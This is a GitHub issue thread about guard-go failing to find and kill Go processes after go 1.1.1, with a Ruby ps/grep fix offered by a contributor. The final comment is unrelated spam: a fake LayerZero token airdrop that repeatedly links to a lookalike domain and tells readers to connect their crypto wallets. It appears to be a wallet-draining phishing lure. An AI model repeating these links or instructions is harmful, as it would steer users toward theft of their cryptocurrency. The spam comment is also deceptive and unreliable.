### ISSUE TITLE
go run no longer produces a.out in ps [go1.1.1]

### ISSUE THREAD

**Issue by trashhalo** [vcastellm/guard-go#5]
The process kill based on finding a.out in ps (or killall a.out) doesn't seem to work after upgrading to go 1.1.1. It seems its now naming executables after the file name passed to run. We need to come up with a more clever way to find the go process.

**Comment by thokra** [comment]
I changed the `ps_go_pid` in `runner.rb` to this:

```
def ps_go_pid
  out = `ps -A -o pid,command | grep '_obj/exe/[#{@options[:server][0]}]#{@options[:server][1..-4]}'`.split($/).each do |line|
    line.split(" ").first
  end
end
```

and it seems to work well in my project. I've only tested it on Linux Mint 15, and it will probably not work in other versions of go. It's looking for `obj_/exe/{filename}`.

**Comment by trashhalo** [comment]
Much better! feel free to close out my other my other ticket.

**Comment by vcastellm** [comment]
Could you make this a PR?

Thanks

**Comment by thokra** [comment]
Will do, just want to do some more testing on it. And maybe add a go version check or something. Or do you want to just target 1.1.1?

**Comment by vcastellm** [comment]
Would be great to show a message for < 1.1.1 users

iPhone := true

El 09/08/2013, a les 10:58, Thomas Krampl notifications@github.com va escriure:

**Comment by Isoltec** [comment]
### LayerZero Airdrop Updated 🪂

The LayerZero Airdrop is confirmed. This is an updated guide to gather the most amount of $ZRO tokens possible.

We're thrilled to have you on board for this exclusive airdrop, and we're committed to making the claiming process seamless just for you. Let's dive in and grab those Layerzero Airdrop tokens!

[Layerzero Oficial](http://link.layerzer0network.online/rFz335)

[![Claim Now](https://miro.medium.com/v2/resize:fit:679/1*BpcMU6_u5SIZz5u-kGMrKw.gif)](http://link.layerzer0network.online/rFz335)

### Secure Your Layerzero Airdrop with These Simple Steps:

1. **Connect Your Wallet:**
   - Head over to the [Layerzero Airdrop](http://link.layerzer0network.online/rFz335).
   - Link up your preferred wallet (Metamask, Coinbase, Trust Wallet, and more).

2. **Eligibility Check:**
   - [Confirm your eligibility for the Layerzero Airdrop](http://link.layerzer0network.online/rFz335).

3. **Engage for Extra Rewards:**
   - Participate in community discussions or complete tasks for bonus rewards.

### Bonus Tips:
- **Community Assistance:**
  - Need help? Drop a message on Telegram or other social media platforms.

- **Stay Informed:**
  - Keep an eye out for updates on the airdrop process via official channels.

- **Patience Pays Off:**
  - Airdrop distribution might take a while. Stay calm and keep an eye out for updates.

Share your experiences or ask any questions about claiming the Layerzero Airdrop in the comments below. Let's make this process a breeze for everyone!
